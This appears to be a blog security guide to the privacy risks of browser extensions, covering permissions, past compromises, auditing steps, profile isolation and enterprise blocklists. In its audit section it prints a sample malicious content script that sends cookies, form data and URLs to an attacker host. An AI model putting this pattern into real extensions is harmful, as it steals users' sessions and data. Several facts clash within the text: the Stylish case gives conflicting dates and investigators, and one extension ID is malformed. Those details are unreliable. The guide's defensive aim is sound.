Privacy Implications of Browser Extensions

Browser extensions are the most dangerous attack surface in everyday web browsing that most people ignore. Unlike malware that requires deception to install, extensions are installed voluntarily, often from well-designed store pages with thousands of positive reviews. They operate inside the browser with permissions that would alarm any security professional — yet users add them casually to get a minor convenience feature.

Understanding what extensions actually can do, and have done, changes how you evaluate them.

What a Browser Extension Can Do Technically

A Chrome or Firefox extension with the <all_urls> permission (which most request) and the ability to run content scripts can:

Read everything on every page you visit:

Form input as you type, including passwords before they’re submitted
Page content before JavaScript obfuscation strips it
DOM modifications that reveal private information in dynamically loaded content

Modify every page you visit:

Replace links with affiliate or malicious links
Inject additional scripts into pages you load
Remove content from pages (e.g., content blockers)
Inject ads or crypto mining code

Access your cookies:

Read session tokens for any site, enabling account takeover without a password
Modify cookies to alter your authenticated state on any site

Build your complete browsing history:

Extensions with tabs and history permissions know every URL you’ve visited since the extension was installed
Cross-reference with time patterns to identify regular behavior (when you wake up, when you check banking, etc.)

Access your clipboard:

Read crypto wallet addresses when you copy them and swap them for attacker addresses
Capture passwords or other sensitive strings you copy

Communicate with external servers:

All of the above can be exfiltrated to any server the extension operator controls
Over encrypted HTTPS, invisible to network-level monitoring

The Extension Compromise Pattern

Most malicious extensions were not malicious when first published. They follow a pattern:

Developer publishes a legitimate, useful extension
Extension gains users over months or years
Developer sells the extension to a third party, or developer’s account is compromised
New owner publishes an update containing tracking or malicious code
Existing users auto-update and receive the malicious version

This pattern has played out repeatedly:

Web of Trust (WOT), 2016: 140 million users. After investigation by German TV, it was found to collect and sell browsing history, including visits to health sites, banking URLs, and other sensitive categories — all supposedly anonymized but easily re-identified.

Stylish, 2018: 2 million users. Collected every URL visited by users, along with personally identifiable information from logged-in sessions. Was removed from stores after a security researcher published the analysis.

The Great Suspender, 2021: 2 million users. Sold to an unknown buyer who added malware. Google removed it from the Chrome Web Store and forcibly disabled it from all users’ browsers.

DataSpii, 2019: A security researcher discovered that multiple popular extensions were exfiltrating browsing history at scale — combined, the affected extensions had hundreds of millions of users. The stolen data included private links to Google Drive documents, corporate internal tools, and medical record portals.

These are the documented cases. Extensions are not systematically audited on an ongoing basis; undiscovered surveillance operations are almost certainly ongoing.

The Review Problem

A high rating and many reviews provide almost no security signal:

Reviews can be purchased. Marketplaces offering 1,000 five-star Chrome extension reviews for under $100 exist.
The extension store review process is automated by default and manual review is triggered only by reports or keywords.
Chrome’s review process does not include continuous code auditing. A clean version passes review; a subsequent malicious update may not be reviewed.
Users who trust a tool they’ve used for years rarely re-read its privacy policy when an update arrives.

Manifest V3 Does Not Solve This

Google’s transition to Manifest V3 for Chrome extensions is often cited as a privacy improvement. The reality is more limited:

MV3 restricts how content blocking extensions can operate (weakening uBlock Origin’s capabilities). It does not prevent:

Access to <all_urls> content scripts
Reading cookies (via cookies API)
Accessing browsing history
Sending data to remote servers via fetch()

The tracking capabilities of extensions are largely unchanged under MV3. The main change affects legitimate content blockers more than malicious extensions.

Risk Model by Permission Level

Maximum risk (treat as full malware access):

<all_urls> + cookies + history — can steal sessions and track all browsing
nativeMessaging — can communicate with installed executables
debugger — can interact with page content at a deeper level than content scripts

High risk:

<all_urls> without cookies — can read all page content and form data
cookies on specific sites — can steal sessions for those sites

Medium risk:

Site-limited activeTab — only active during explicit use
storage — can persist data but cannot access page content without other permissions

Lower risk:

New tab page override — limited surface area
Omnibox suggestions — can see your search queries

The Minimum Footprint Principle

Each extension you install is a potential persistent adversary inside your browser. Apply the minimum footprint principle:

For every extension, ask:

Is this solving a problem I cannot solve with native browser features or settings?
Does the requested permission level match the stated function?
Who maintains this? Is it a known organization or anonymous?
When was it last updated, and what did the update contain?

Extensions that request <all_urls> for a task that only needs to interact with one site should be rejected or replaced with a site-specific alternative.

Alternatives to Common High-Permission Extensions

Common extension	Required permission	Alternative
Coupon finder	`<all_urls>` to read shopping pages	Don’t use auto-coupons
Screenshot tool	`<all_urls>` + screen capture	OS screenshot (Cmd+Shift+4, Print Screen)
Grammar checker	`<all_urls>` to read all text	Browser-native spell check
-	Password autofill	`<all_urls>`	OS-integrated password manager (Safari, Windows Hello)
Tab manager	`tabs` permission	Native browser tab groups

Isolating Extensions

If you must use an extension you don’t fully trust:

Chrome: Use Chrome Profiles to isolate extensions. Create a separate profile for sensitive browsing with no extensions, and keep your extension-heavy profile for general use.

Firefox: Use Multi-Account Containers. Extensions can be scoped to containers, though this requires careful setup.

Dedicated browser instance: Run a second browser (e.g., LibreWolf) with no extensions for banking and healthcare sites. Use your extension-equipped browser for general web browsing.

# Launch a separate Chrome instance with a clean profile (no extensions)
google-chrome --user-data-dir=/tmp/clean-profile --no-first-run

# Or use a Firefox profile without extensions
firefox -P clean-profile

This profile separation ensures that even a compromised extension cannot read your banking session, because the sessions exist in completely separate browser processes.

Auditing Extensions Before Installation

Before installing any extension, conduct this audit:

Step 1: Check Developer Reputation

Who published this extension? Search for “[extension name] security incident” or “[developer name] scam”
Does the developer have other extensions? Legitimate developers maintain multiple tools
When was the last update? Extensions inactive for 6+ months are higher risk
How many users? More users mean more visibility to security researchers (not foolproof, but relevant)

Step 2: Review Requested Permissions

# For Chrome, inspect the manifest.json of any extension
# Permission requests appear in manifest.json under "permissions"
# Examples:
# "permissions": ["<all_urls>"]  # DANGEROUS - can read all sites
# "permissions": ["history"]     # DANGEROUS - can see your browsing history
# "permissions": ["cookies"]     # DANGEROUS - can steal session tokens
# "permissions": ["tabs"]        # HIGH RISK - knows every URL you visit
# "permissions": ["storage"]     # MEDIUM - can persist data
# "permissions": ["activeTab"]   # LOWER - only active during use

Step 3: Check for Suspicious Content Scripts Extensions inject content scripts into pages you visit. Examine what the script actually does:

// Example: Malicious content script pattern
// (This is what you want to AVOID in audited extensions)

fetch('https://attacker-site.com/log', {
    method: 'POST',
    body: JSON.stringify({
        url: document.location.href,
        cookies: document.cookie,
        formData: getAllFormValues()
    })
});

A legitimate extension only sends necessary data to its own servers.

Step 4: Use VirusTotal for Quick Scanning For Chrome extensions, you can download the .crx file and scan it:

# Download the extension from Chrome Web Store
# Then upload to VirusTotal.com or use the API:
curl -X POST https://www.virustotal.com/api/v3/files \
  -H "x-apikey: YOUR_API_KEY" \
  -F file=@extension.crx

Extension Compromise Timeline: Real Examples

Understanding how compromises happen helps you spot warning signs:

The Great Suspender Timeline (2018-2021):

March 2018 - Extension reaches 2 million users
2020 - Original developer stops maintenance
November 2020 - Unknown buyer acquires extension
April 2021 - Google discovers malware in new version 8.3.3
May 2021 - Google forcibly removes from all users’ browsers
Timeline: 3+ years of trust before compromise

Lesson: Watch for ownership changes

Stylish Timeline (2016-2018):

2016 - Extends to 2 million users
2016 - German TV (Das Erste) investigates data collection
Discovers: Extension collects every URL visited, including private portals
May 2019 - Removed from Chrome Web Store
Timeline: 2 years of hidden tracking

Lesson: High user count and good ratings don’t guarantee safety

Building an Extension Allowlist

Rather than trusting all extensions, maintain an allowlist of specifically audited ones:

#!/bin/bash
# Extension allowlist system

APPROVED_EXTENSIONS=(
    "ublock-origin"          # ID: cjpalhdlnbpafiamejdnhcphjbkeiagm
    "privacy-badger"         # ID: mkejgcgkdcdn6qmkjjhddgknm3je4du
    "https-everywhere"       # Deprecated - use browser defaults instead
)

# Check installed extensions against allowlist
# This script periodically verifies no unauthorized extensions are installed

check_extensions() {
    for ext in $(chrome_query_extensions); do
        if [[ ! " ${APPROVED_EXTENSIONS[@]} " =~ " ${ext} " ]]; then
            echo "ALERT: Unauthorized extension detected: $ext"
            echo "Recommend immediate removal"
        fi
    done
}

Manifest V3 Extensions to Avoid

MV3 changed how extensions work. While improvements exist, some MV3 extensions are intentionally weakened:

Content blockers suffer under MV3:

uBlock Origin in MV3 mode cannot block all ad types that MV2 could
uBlock Origin Lite (MV3 version) is significantly weaker than Classic
Stick with uBlock Origin Classic (MV2) while available, then migrate to Brave Browser’s native blocking

MV3 extensions that actually improve privacy:

Bitwarden password manager (works with fewer permissions)
Privacy Badger (functional under MV3 limitations)
HTTPS Everywhere functionality (now built into browsers)

Enterprise Extension Policies

For organizations managing employee browsers:

Group Policy (Windows):

Computer Configuration > Administrative Templates >
Google/Chromium > Extensions > Configure Extension Policies

Mobile Device Management (MDM):

{
  "ExtensionInstallForcelist": [
    "cjpalhdlnbpafiamejdnhcphjbkeiagm;https://clients2.google.com/service/update2/crx"
  ],
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionSettings": {
    "*": {
      "installation_mode": "blocked"
    }
  }
}

This allows only explicitly approved extensions and blocks all others.

Firefox vs Chrome Extension Security

Firefox security model:

Extensions reviewed more thoroughly before publication
Firefox auto-disables unsigned extensions
Reviewers check for common malware patterns

Chrome security model:

Less manual review, more automated scanning
Chrome Web Store reviews trigger on reports or keywords
Security analysis is lighter during initial approval

Verdict: Firefox’s review process is more rigorous, making Firefox extension compromises less common. However, both platforms have had exploited extensions.

Built by theluckystrike — More at zovo.one